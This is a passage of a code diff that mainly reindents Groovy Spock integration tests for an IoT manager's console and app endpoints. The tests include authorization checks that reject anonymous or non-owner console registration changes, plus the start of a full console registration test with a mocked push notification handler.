+      topic = "${keycloakTestSetup.realmBuilding.name}/$mqttClientId/$DefaultMQTTHandler.ATTRIBUTE_VALUE_WRITE_TOPIC/counter$i/${assetMultiID}".toString()
+      def payload = i.toString()
+      client.sendMessage(new MQTTMessage<String>(topic, payload))
+    }
+
+    then: "all attribute updates should be received by the client"
+    new PollingConditions(timeout: 300, initialDelay: 10, delay: 10).eventually {
+      getLOG().info("Events processed = ${receivedEvents.size()}")
+      assert endTime> 0
+    }
+    getLOG().info("Time taken to process $eventCount events for multi attribute asset = ${endTime-startTime}ms")
+
+    cleanup: "output processing time"
+    if (client != null) {
+      client.disconnect()
+    }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/console/ConsoleTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/console/ConsoleTest.groovy
@@ -76,978 +76,995 @@ import static org.openremote.setup.integration.ManagerTestSetup.SMART_BUILDING_L
 
 class ConsoleTest extends Specification implements ManagerContainerTrait {
 
-    def "Console config endpoint returns 404 when console_config.json is missing"() {
-        given: "a custom app doc root without a console config file"
-        def customAppDocRoot = Files.createTempDirectory("console-config-missing-")
-        def container = startContainer(defaultConfig() << [(ManagerWebService.OR_CUSTOM_APP_DOCROOT): customAppDocRoot.toString()], defaultServices())
-        def requestTarget = getClientApiTarget(serverUri(serverPort), MASTER_REALM).path("apps").path("consoleConfig")
+  def "Console config endpoint returns 404 when console_config.json is missing"() {
+    given: "a custom app doc root without a console config file"
+    def customAppDocRoot = Files.createTempDirectory("console-config-missing-")
+    def container = startContainer(defaultConfig() << [(ManagerWebService.OR_CUSTOM_APP_DOCROOT): customAppDocRoot.toString()], defaultServices())
+    def requestTarget = getClientApiTarget(serverUri(serverPort), MASTER_REALM).path("apps").path("consoleConfig")
 
-        when: "requesting the console config"
-        def response = requestTarget.request().get()
+    when: "requesting the console config"
+    def response = requestTarget.request().get()
 
-        then: "the endpoint should return 404"
-        response.withCloseable {r ->
-            assert r.status == 404
-            return true
-        }
-
-        cleanup:
-        if (response != null) {
-            response.close()
-        }
-        Files.deleteIfExists(customAppDocRoot)
+    then: "the endpoint should return 404"
+    response.withCloseable {r ->
+      assert r.status == 404
+      return true
     }
 
-    def "Console config endpoint returns 200 when console_config.json exists"() {
-        given: "a custom app doc root with a console config file"
-        def customAppDocRoot = Files.createTempDirectory("console-config-present-")
-        def consoleConfigPath = customAppDocRoot.resolve("console_config.json")
-        Files.write(consoleConfigPath, "{}".getBytes(StandardCharsets.UTF_8))
+    cleanup:
+    if (response != null) {
+      response.close()
+    }
+    Files.deleteIfExists(customAppDocRoot)
+  }
 
-        def container = startContainer(defaultConfig() << [(ManagerWebService.OR_CUSTOM_APP_DOCROOT): customAppDocRoot.toString()], defaultServices())
-        def requestTarget = getClientApiTarget(serverUri(serverPort), MASTER_REALM).path("apps").path("consoleConfig")
+  def "Console config endpoint returns 200 when console_config.json exists"() {
+    given: "a custom app doc root with a console config file"
+    def customAppDocRoot = Files.createTempDirectory("console-config-present-")
+    def consoleConfigPath = customAppDocRoot.resolve("console_config.json")
+    Files.write(consoleConfigPath, "{}".getBytes(StandardCharsets.UTF_8))
 
-        when: "requesting the console config"
-        def response = requestTarget.request().get()
+    def container = startContainer(defaultConfig() << [(ManagerWebService.OR_CUSTOM_APP_DOCROOT): customAppDocRoot.toString()], defaultServices())
+    def requestTarget = getClientApiTarget(serverUri(serverPort), MASTER_REALM).path("apps").path("consoleConfig")
 
-        then: "the endpoint should return 200"
-        response.withCloseable { r ->
-            assert r.status == 200
-            return true
-        }
+    when: "requesting the console config"
+    def response = requestTarget.request().get()
 
-        cleanup:
-        if (response != null) {
-            response.close()
-        }
-        Files.deleteIfExists(consoleConfigPath)
-        Files.deleteIfExists(customAppDocRoot)
+    then: "the endpoint should return 200"
+    response.withCloseable { r ->
+      assert r.status == 200
+      return true
     }
 
-    def "Apps endpoint returns built-in and custom apps"() {
-        given: "built-in and custom app doc roots with app folders"
-        def builtInDocRoot = Files.createTempDirectory("apps-builtin-")
-        def customDocRoot = Files.createTempDirectory("apps-custom-")
-        Files.createDirectories(builtInDocRoot.resolve("appBuiltin"))
-        Files.createDirectories(customDocRoot.resolve("appCustom"))
+    cleanup:
+    if (response != null) {
+      response.close()
+    }
+    Files.deleteIfExists(consoleConfigPath)
+    Files.deleteIfExists(customAppDocRoot)
+  }
 
-        def container = startContainer(defaultConfig() << [
-                (ManagerWebService.OR_APP_DOCROOT)       : builtInDocRoot.toString(),
-                (ManagerWebService.OR_CUSTOM_APP_DOCROOT): customDocRoot.toString()
-        ], defaultServices())
-        def requestTarget = getClientApiTarget(serverUri(serverPort), MASTER_REALM).path("apps")
+  def "Apps endpoint returns built-in and custom apps"() {
+    given: "built-in and custom app doc roots with app folders"
+    def builtInDocRoot = Files.createTempDirectory("apps-builtin-")
+    def customDocRoot = Files.createTempDirectory("apps-custom-")
+    Files.createDirectories(builtInDocRoot.resolve("appBuiltin"))
+    Files.createDirectories(customDocRoot.resolve("appCustom"))
 
-        when: "requesting the apps list"
-        def response = requestTarget.request().get()
+    def container = startContainer(defaultConfig() << [
+      (ManagerWebService.OR_APP_DOCROOT) : builtInDocRoot.toString(),
+      (ManagerWebService.OR_CUSTOM_APP_DOCROOT): customDocRoot.toString()
+    ], defaultServices())
+    def requestTarget = getClientApiTarget(serverUri(serverPort), MASTER_REALM).path("apps")
 
-        then: "both apps are returned"
-        response.withCloseable { r ->
-            assert r.status == 200
-            def appList = parse(r.readEntity(String.class)).orElse("") as String
-            appList.contains("appBuiltin")
-            appList.contains("appCustom")
-            return true
-        }
+    when: "requesting the apps list"
+    def response = requestTarget.request().get()
 
-        cleanup:
-        if (response != null) {
-            response.close()
-        }
-        Files.deleteIfExists(builtInDocRoot.resolve("appBuiltin"))
-        Files.deleteIfExists(builtInDocRoot)
-        Files.deleteIfExists(customDocRoot.resolve("appCustom"))
-        Files.deleteIfExists(customDocRoot)
+    then: "both apps are returned"
+    response.withCloseable { r ->
+      assert r.status == 200
+      def appList = parse(r.readEntity(String.class)).orElse("") as String
+      appList.contains("appBuiltin")
+      appList.contains("appCustom")
+      return true
     }
 
-    def "Apps endpoint treats missing app doc root as empty"() {
-        given: "a built-in app doc root and a missing custom app doc root"
-        def builtInDocRoot = Files.createTempDirectory("apps-builtin-")
-        def customDocRootParent = Files.createTempDirectory("apps-missing-custom-")
-        def customDocRoot = customDocRootParent.resolve("missing")
-        Files.createDirectories(builtInDocRoot.resolve("appBuiltin"))
+    cleanup:
+    if (response != null) {
+      response.close()
+    }
+    Files.deleteIfExists(builtInDocRoot.resolve("appBuiltin"))
+    Files.deleteIfExists(builtInDocRoot)
+    Files.deleteIfExists(customDocRoot.resolve("appCustom"))
+    Files.deleteIfExists(customDocRoot)
+  }
 
-        def container = startContainer(defaultConfig() << [
-                (ManagerWebService.OR_APP_DOCROOT)       : builtInDocRoot.toString(),
-                (ManagerWebService.OR_CUSTOM_APP_DOCROOT): customDocRoot.toString()
-        ], defaultServices())
-        def requestTarget = getClientApiTarget(serverUri(serverPort), MASTER_REALM).path("apps")
+  def "Apps endpoint treats missing app doc root as empty"() {
+    given: "a built-in app doc root and a missing custom app doc root"
+    def builtInDocRoot = Files.createTempDirectory("apps-builtin-")
+    def customDocRootParent = Files.createTempDirectory("apps-missing-custom-")
+    def customDocRoot = customDocRootParent.resolve("missing")
+    Files.createDirectories(builtInDocRoot.resolve("appBuiltin"))
 
-        when: "requesting the apps list"
-        def response = requestTarget.request().get()
+    def container = startContainer(defaultConfig() << [
+      (ManagerWebService.OR_APP_DOCROOT) : builtInDocRoot.toString(),
+      (ManagerWebService.OR_CUSTOM_APP_DOCROOT): customDocRoot.toString()
+    ], defaultServices())
+    def requestTarget = getClientApiTarget(serverUri(serverPort), MASTER_REALM).path("apps")
 
-        then: "the missing root is ignored and apps from the available root are returned"
-        response.withCloseable { r ->
-            assert r.status == 200
-            def appList = parse(r.readEntity(String.class)).orElse("") as String
-            appList.contains("appBuiltin")
-            return true
-        }
+    when: "requesting the apps list"
+    def response = requestTarget.request().get()
 
-        cleanup:
-        if (response != null) {
-            response.close()
-        }
-        Files.deleteIfExists(builtInDocRoot.resolve("appBuiltin"))
-        Files.deleteIfExists(builtInDocRoot)
-        Files.deleteIfExists(customDocRootParent)
+    then: "the missing root is ignored and apps from the available root are returned"
+    response.withCloseable { r ->
+      assert r.status == 200
+      def appList = parse(r.readEntity(String.class)).orElse("") as String
+      appList.contains("appBuiltin")
+      return true
     }
 
-    def "Apps info endpoint returns info for custom apps"() {
-        given: "a custom app doc root with an info.json file"
-        def customDocRoot = Files.createTempDirectory("apps-info-custom-")
-        def appDir = customDocRoot.resolve("appInfo")
-        Files.createDirectories(appDir)
-        Files.write(appDir.resolve("info.json"), "{\"name\":\"appInfo\"}".getBytes(StandardCharsets.UTF_8))
+    cleanup:
+    if (response != null) {
+      response.close()
+    }
+    Files.deleteIfExists(builtInDocRoot.resolve("appBuiltin"))
+    Files.deleteIfExists(builtInDocRoot)
+    Files.deleteIfExists(customDocRootParent)
+  }
 
-        def container = startContainer(defaultConfig() << [
-                (ManagerWebService.OR_CUSTOM_APP_DOCROOT): customDocRoot.toString()
-        ], defaultServices())
-        def consoleAppService = container.getService(ConsoleAppService.class)
-        consoleAppService.@consoleAppDocRoot = customDocRoot
+  def "Apps info endpoint returns info for custom apps"() {
+    given: "a custom app doc root with an info.json file"
+    def customDocRoot = Files.createTempDirectory("apps-info-custom-")
+    def appDir = customDocRoot.resolve("appInfo")
+    Files.createDirectories(appDir)
+    Files.write(appDir.resolve("info.json"), "{\"name\":\"appInfo\"}".getBytes(StandardCharsets.UTF_8))
 
-        def requestTarget = getClientApiTarget(serverUri(serverPort), MASTER_REALM).path("apps").path("info")
+    def container = startContainer(defaultConfig() << [
+      (ManagerWebService.OR_CUSTOM_APP_DOCROOT): customDocRoot.toString()
+    ], defaultServices())
+    def consoleAppService = container.getService(ConsoleAppService.class)
+    consoleAppService.@consoleAppDocRoot = customDocRoot
 
-        when: "requesting the apps info"
-        def response = requestTarget.request().get()
+    def requestTarget = getClientApiTarget(serverUri(serverPort), MASTER_REALM).path("apps").path("info")
 
-        then: "the response includes the app info"
-        response.withCloseable { r ->
-            assert r.status == 200
-            Map infoMap = parse(response.readEntity(String.class)).orElse([:])
-            infoMap.containsKey("appInfo")
-            return true
-        }
+    when: "requesting the apps info"
+    def response = requestTarget.request().get()
 
-        cleanup:
-        Files.deleteIfExists(appDir.resolve("info.json"))
-        Files.deleteIfExists(appDir)
-        Files.deleteIfExists(customDocRoot)
+    then: "the response includes the app info"
+    response.withCloseable { r ->
+      assert r.status == 200
+      Map infoMap = parse(response.readEntity(String.class)).orElse([:])
+      infoMap.containsKey("appInfo")
+      return true
     }
 
-    def "Console registration rejects existing console mutation without current ownership"() {
-        given: "the container environment is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    cleanup:
+    Files.deleteIfExists(appDir.resolve("info.json"))
+    Files.deleteIfExists(appDir)
+    Files.deleteIfExists(customDocRoot)
+  }
 
-        and: "console registration clients for two users and an anonymous caller"
-        def testUser3AccessToken = authenticate(
-                container,
-                keycloakTestSetup.realmBuilding.name,
-                KEYCLOAK_CLIENT_ID,
-                "testuser3",
-                "testuser3"
-        )
-        def testUser2AccessToken = authenticate(
-                container,
-                keycloakTestSetup.realmBuilding.name,
-                KEYCLOAK_CLIENT_ID,
-                "testuser2",
-                "testuser2"
-        )
-        def testUser3ConsoleResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, testUser3AccessToken).proxy(ConsoleResource.class)
-        def testUser2ConsoleResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, testUser2AccessToken).proxy(ConsoleResource.class)
-        def anonymousConsoleResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name).proxy(ConsoleResource.class)
+  def "Console registration rejects existing console mutation without current ownership"() {
+    given: "the container environment is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
 
-        when: "a console is registered by one authenticated user"
-        def originalRegistration = createConsoleRegistration(null, "Owner Console", "owner-token")
-        def registeredConsole = testUser3ConsoleResource.register(null, originalRegistration)
-        def consoleId = registeredConsole.id
-        ConsoleAsset console = assetStorageService.find(consoleId, true)
+    and: "console registration clients for two users and an anonymous caller"
+    def testUser3AccessToken = authenticate(
+            container,
+            keycloakTestSetup.realmBuilding.name,
+            KEYCLOAK_CLIENT_ID,
+            "testuser3",
+            "testuser3"
+            )
+    def testUser2AccessToken = authenticate(
+            container,
+            keycloakTestSetup.realmBuilding.name,
+            KEYCLOAK_CLIENT_ID,
+            "testuser2",
+            "testuser2"
+            )
+    def testUser3ConsoleResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, testUser3AccessToken).proxy(ConsoleResource.class)
+    def testUser2ConsoleResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, testUser2AccessToken).proxy(ConsoleResource.class)
+    def anonymousConsoleResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name).proxy(ConsoleResource.class)
 
-        then: "the console is linked to the registering user and has the original provider data"
-        assert console != null
-        assert console.getConsoleName().orElse(null) == "Owner Console"
-        assert getPushToken(console) == "owner-token"
-        assert assetStorageService.findUserAssetLinks(keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser3Id, consoleId).size() == 1
-        assert assetStorageService.findUserAssetLinks(keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id, consoleId).isEmpty()
+    when: "a console is registered by one authenticated user"
+    def originalRegistration = createConsoleRegistration(null, "Owner Console", "owner-token")
+    def registeredConsole = testUser3ConsoleResource.register(null, originalRegistration)
+    def consoleId = registeredConsole.id
+    ConsoleAsset console = assetStorageService.find(consoleId, true)
 
-        when: "an anonymous caller tries to mutate the existing console by ID"
-        anonymousConsoleResource.register(null, createConsoleRegistration(consoleId, "Anonymous Attacker Console", "anonymous-attacker-token"))
+    then: "the console is linked to the registering user and has the original provider data"
+    assert console != null
+    assert console.getConsoleName().orElse(null) == "Owner Console"
+    assert getPushToken(console) == "owner-token"
+    assert assetStorageService.findUserAssetLinks(keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser3Id, consoleId).size() == 1
+    assert assetStorageService.findUserAssetLinks(keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id, consoleId).isEmpty()
 
-        then: "the request should be rejected"
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403 || r.status == 409
-            return true
-        }
+    when: "an anonymous caller tries to mutate the existing console by ID"
+    anonymousConsoleResource.register(null, createConsoleRegistration(consoleId, "Anonymous Attacker Console", "anonymous-attacker-token"))
 
-        and: "the console provider data should remain unchanged"
-        ConsoleAsset consoleAfterAnonymousAttempt = assetStorageService.find(consoleId, true)
-        assert consoleAfterAnonymousAttempt.getConsoleName().orElse(null) == "Owner Console"
-        assert getPushToken(consoleAfterAnonymousAttempt) == "owner-token"
-        assert assetStorageService.findUserAssetLinks(keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser3Id, consoleId).size() == 1
-        assert assetStorageService.findUserAssetLinks(keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id, consoleId).isEmpty()
-
-        when: "a different authenticated user tries to claim the existing console by ID"
-        testUser2ConsoleResource.register(null, createConsoleRegistration(consoleId, "Other User Console", "other-user-token"))
-
-        then: "the request should be rejected"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403 || r.status == 409
-            return true
-        }
-
-        and: "the original user link and provider data should remain unchanged"
-        ConsoleAsset consoleAfterOtherUserAttempt = assetStorageService.find(consoleId, true)
-        assert consoleAfterOtherUserAttempt.getConsoleName().orElse(null) == "Owner Console"
-        assert getPushToken(consoleAfterOtherUserAttempt) == "owner-token"
-        assert assetStorageService.findUserAssetLinks(keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser3Id, consoleId).size() == 1
-        assert assetStorageService.findUserAssetLinks(keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id, consoleId).isEmpty()
+    then: "the request should be rejected"
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403 || r.status == 409
+      return true
     }
 
-    def "Console registration rejects client supplied IDs for new legacy consoles"() {
-        given: "the container environment is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    and: "the console provider data should remain unchanged"
+    ConsoleAsset consoleAfterAnonymousAttempt = assetStorageService.find(consoleId, true)
+    assert consoleAfterAnonymousAttempt.getConsoleName().orElse(null) == "Owner Console"
+    assert getPushToken(consoleAfterAnonymousAttempt) == "owner-token"
+    assert assetStorageService.findUserAssetLinks(keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser3Id, consoleId).size() == 1
+    assert assetStorageService.findUserAssetLinks(keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id, consoleId).isEmpty()
 
-        and: "an authenticated console registration client"
-        def accessToken = authenticate(
-                container,
-                keycloakTestSetup.realmBuilding.name,
-                KEYCLOAK_CLIENT_ID,
-                "testuser3",
-                "testuser3"
-        )
-        def authenticatedConsoleResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, accessToken).proxy(ConsoleResource.class)
+    when: "a different authenticated user tries to claim the existing console by ID"
+    testUser2ConsoleResource.register(null, createConsoleRegistration(consoleId, "Other User Console", "other-user-token"))
 
-        when: "a client tries to create a console with its own unused ID"
-        def unusedId = UniqueIdentifierGenerator.generateId("UnusedConsoleIdRejectedByLegacyRegister")
-        authenticatedConsoleResource.register(null, createConsoleRegistration(unusedId, "Client Supplied ID Console", "client-token"))
-
-        then: "the request should be rejected"
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400 || r.status == 409
-            return true
-        }
-
-        and: "no console asset should be created with the supplied ID"
-        assert assetStorageService.find(unusedId, true) == null
+    then: "the request should be rejected"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403 || r.status == 409
+      return true
     }
 
-    def "Check full console behaviour"() {
-        def notificationIds = new CopyOnWriteArrayList()
-        def targetTypes = new CopyOnWriteArrayList()
-        def targetIds = new CopyOnWriteArrayList()
-        def messages = new CopyOnWriteArrayList()
+    and: "the original user link and provider data should remain unchanged"
+    ConsoleAsset consoleAfterOtherUserAttempt = assetStorageService.find(consoleId, true)
+    assert consoleAfterOtherUserAttempt.getConsoleName().orElse(null) == "Owner Console"
+    assert getPushToken(consoleAfterOtherUserAttempt) == "owner-token"
+    assert assetStorageService.findUserAssetLinks(keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser3Id, consoleId).size() == 1
+    assert assetStorageService.findUserAssetLinks(keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id, consoleId).isEmpty()
+  }
 
-        given: "the container environment is started"
-        def conditions = new PollingConditions(timeout: 20, delay: 0.2)
-        ORConsoleGeofenceAssetAdapter.NOTIFY_ASSETS_DEBOUNCE_MILLIS = 100
-        ORConsoleGeofenceAssetAdapter.NOTIFY_ASSETS_BATCH_MILLIS = 200
-        def container = startContainer(defaultConfig(), defaultServices())
-        def pushNotificationHandler = container.getService(PushNotificationHandler.class)
-        def notificationService = container.getService(NotificationService.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def timerService = container.getService(TimerService.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def rulesService = container.getService(RulesService.class)
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
+  def "Console registration rejects client supplied IDs for new legacy consoles"() {
+    given: "the container environment is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
 
-        and: "a mock push notification handler is injected"
-        PushNotificationHandler mockPushNotificationHandler = Spy(pushNotificationHandler)
-        mockPushNotificationHandler.isValid() >> true
-        mockPushNotificationHandler.sendMessage(_ as Long, _ as Notification.Source, _ as String, _ as Notification.Target, _ as PushNotificationMessage) >> {
-                Long id, Notification.Source source, String sourceId, Notification.Target target, PushNotificationMessage message ->
+    and: "an authenticated console registration client"
+    def accessToken = authenticate(
+            container,
+            keycloakTestSetup.realmBuilding.name,
+            KEYCLOAK_CLIENT_ID,
+            "testuser3",
+            "testuser3"
+            )
+    def authenticatedConsoleResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, accessToken).proxy(ConsoleResource.class)
 
-                    message.title = target.id // Makes it easier to test/debug
-                    message.body = timerService.getCurrentTimeMillis() // Makes it easier to test/debug
-                    notificationIds << id
-                    targetTypes << target.type
-                    targetIds << target.id
-                    messages << "${message.title}_${message.data.get("action")}"
-                    callRealMethod()
-            }
-        // Assume sent to FCM
-        mockPushNotificationHandler.sendMessage(_ as Message) >> {
-                message -> return NotificationSendResult.success()
-            }
-        notificationService.notificationHandlerMap.put(pushNotificationHandler.getTypeName(), mockPushNotificationHandler)
+    when: "a client tries to create a console with its own unused ID"
+    def unusedId = UniqueIdentifierGenerator.generateId("UnusedConsoleIdRejectedByLegacyRegister")
+    authenticatedConsoleResource.register(null, createConsoleRegistration(unusedId, "Client Supplied ID Console", "client-token"))
 
-        def geofenceAdapter = (ORConsoleGeofenceAssetAdapter) rulesService.geofenceAssetAdapters.find {
-            it.name == "ORConsole"
-        }
-        Asset testUser3Console1, testUser3Console2, anonymousConsole1
+    then: "the request should be rejected"
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400 || r.status == 409
+      return true
+    }
 
-        and: "the demo location predicate console rules are loaded"
-        Ruleset ruleset = new RealmRuleset(
+    and: "no console asset should be created with the supplied ID"
+    assert assetStorageService.find(unusedId, true) == null
+  }
+
+  def "Check full console behaviour"() {
+    def notificationIds = new CopyOnWriteArrayList()
+    def targetTypes = new CopyOnWriteArrayList()
+    def targetIds = new CopyOnWriteArrayList()
+    def messages = new CopyOnWriteArrayList()
+
+    given: "the container environment is started"
+    def conditions = new PollingConditions(timeout: 20, delay: 0.2)
+    ORConsoleGeofenceAssetAdapter.NOTIFY_ASSETS_DEBOUNCE_MILLIS = 100
+    ORConsoleGeofenceAssetAdapter.NOTIFY_ASSETS_BATCH_MILLIS = 200
+    def container = startContainer(defaultConfig(), defaultServices())
+    def pushNotificationHandler = container.getService(PushNotificationHandler.class)
+    def notificationService = container.getService(NotificationService.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def timerService = container.getService(TimerService.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def rulesService = container.getService(RulesService.class)
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+
+    and: "a mock push notification handler is injected"
+    PushNotificationHandler mockPushNotificationHandler = Spy(pushNotificationHandler)
+    mockPushNotificationHandler.isValid() >> true
+    mockPushNotificationHandler.sendMessage(_ as Long, _ as Notification.Source, _ as String, _ as Notification.Target, _ as PushNotificationMessage) >> { Long id, Notification.Source source, String sourceId, Notification.Target target, PushNotificationMessage message ->
+
+      message.title = target.id // Makes it easier to test/debug
+      message.body = timerService.getCurrentTimeMillis() // Makes it easier to test/debug
+      notificationIds << id
+      targetTypes << target.type
+      targetIds << target.id
+      messages << "${message.title}_${message.data.get("action")}"
+      callRealMethod()
+    }
+    // Assume sent to FCM
+    mockPushNotificationHandler.sendMessage(_ as Message) >> { message ->
+      return NotificationSendResult.success()
+    }
+    notificationService.notificationHandlerMap.put(pushNotificationHandler.getTypeName(), mockPushNotificationHandler)
+
+    def geofenceAdapter = (ORConsoleGeofenceAssetAdapter) rulesService.geofenceAssetAdapters.find {
+      it.name == "ORConsole"
+    }
+    Asset testUser3Console1, testUser3Console2, anonymousConsole1
+
+    and: "the demo location predicate console rules are loaded"
+    Ruleset ruleset = new RealmRuleset(
             keycloakTestSetup.realmBuilding.name,
             "Demo Realm Building - Console Location",
             Ruleset.Lang.GROOVY,
             getClass().getResource("/org/openremote/test/rules/ConsoleLocation.groovy").text)
-        rulesetStorageService.merge(ruleset)
+    rulesetStorageService.merge(ruleset)
 
-        expect: "the rule engine to become available and be running"
-        conditions.eventually {
-            def realmBuildingEngine = rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name)
-            assert realmBuildingEngine != null
-            assert realmBuildingEngine.isRunning()
-            assert realmBuildingEngine.facts.getAssetStates().size() == DEMO_RULE_STATES_SMART_BUILDING
-        }
+    expect: "the rule engine to become available and be running"
+    conditions.eventually {
+      def realmBuildingEngine = rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name)
+      assert realmBuildingEngine != null
+      assert realmBuildingEngine.isRunning()
+      assert realmBuildingEngine.facts.getAssetStates().size() == DEMO_RULE_STATES_SMART_BUILDING
+    }
 
-        and: "an authenticated user"
-        def accessToken = authenticate(
-                container,
-                keycloakTestSetup.realmBuilding.name,
-                KEYCLOAK_CLIENT_ID,
-                "testuser3",
-                "testuser3"
-        )
+    and: "an authenticated user"
+    def accessToken = authenticate(
+            container,
+            keycloakTestSetup.realmBuilding.name,
+            KEYCLOAK_CLIENT_ID,
+            "testuser3",
+            "testuser3"
+            )
 
-        and: "authenticated and anonymous console, rules and asset resources"
-        def authenticatedConsoleResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, accessToken).proxy(ConsoleResource.class)
-        def authenticatedRulesResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, accessToken).proxy(RulesResource.class)
-        def authenticatedAssetResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, accessToken).proxy(AssetResource.class)
-        def anonymousConsoleResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name).proxy(ConsoleResource.class)
-        def anonymousRulesResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name).proxy(RulesResource.class)
+    and: "authenticated and anonymous console, rules and asset resources"
+    def authenticatedConsoleResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, accessToken).proxy(ConsoleResource.class)
+    def authenticatedRulesResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, accessToken).proxy(RulesResource.class)
+    def authenticatedAssetResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, accessToken).proxy(AssetResource.class)
+    def anonymousConsoleResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name).proxy(ConsoleResource.class)
+    def anonymousRulesResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name).proxy(RulesResource.class)
 
-        when: "a console registers with an authenticated user"
-        def consoleRegistration = new ConsoleRegistration(null,
-                "Test Console",
-                "1.0",
-                "Android 7.0",
-                new HashMap<String, ConsoleProvider>(
-                        geofence: new ConsoleProvider(
-                                ORConsoleGeofenceAssetAdapter.NAME,
-                                true,
-                                false,
-                                false,
-                                false,
-                                false,
-                                null
-                        ),
-                        push: new ConsoleProvider(
-                                "fcm",
-                                true,
-                                true,
-                                true,
-                                true,
-                                false,
+    when: "a console registers with an authenticated user"
+    def consoleRegistration = new ConsoleRegistration(null,
+            "Test Console",
+            "1.0",
+            "Android 7.0",
+            new HashMap<String, ConsoleProvider>(
+                    geofence: new ConsoleProvider(
+                            ORConsoleGeofenceAssetAdapter.NAME,
+                            true,
+                            false,
+                            false,
+                            false,
+                            false,
+                            null
+                            ),
+                    push: new ConsoleProvider(
+                            "fcm",
+                            true,
+                            true,
+                            true,
+                            true,
+                            false,
                             (Map)parse("{\"token\": \"23123213ad2313b0897efd\"}").orElse(null)
-                        )
-                  ),
-                "",
-                ["manager"] as String[])
-        def returnedConsoleRegistration = authenticatedConsoleResource.register(null, consoleRegistration)
-        def consoleId = returnedConsoleRegistration.getId()
-        ConsoleAsset console = assetStorageService.find(consoleId, true)
+                            )
+                    ),
+            "",
+            ["manager"] as String[])
+    def returnedConsoleRegistration = authenticatedConsoleResource.register(null, consoleRegistration)
+    def consoleId = returnedConsoleRegistration.getId()
+    ConsoleAsset console = assetStorageService.find(consoleId, true)
 
-        then: "the console asset should have been created and be correctly configured"
-        assert console != null
-        assert console.getConsoleName().orElse(null) == "Test Console"
-        assert console.getConsoleVersion().orElse(null) == "1.0"
-        assert console.getConsolePlatform().orElse(null) == "Android 7.0"
-        def consoleGeofenceProvider = console.getConsoleProviders().map{it.get("geofence")}.orElse(null)
-        def consolePushProvider = console.getConsoleProviders().map{it.get("push")}.orElse(null)
-        assert consoleGeofenceProvider != null
-        assert consoleGeofenceProvider.version == ORConsoleGeofenceAssetAdapter.NAME
-        assert consoleGeofenceProvider.requiresPermission
-        assert !consoleGeofenceProvider.hasPermission
-        assert !consoleGeofenceProvider.disabled
-        assert consoleGeofenceProvider.data == null
-        assert consolePushProvider != null
-        assert consolePushProvider.version == "fcm"
-        assert consolePushProvider.requiresPermission
-        assert consolePushProvider.hasPermission
-        assert !consolePushProvider.disabled
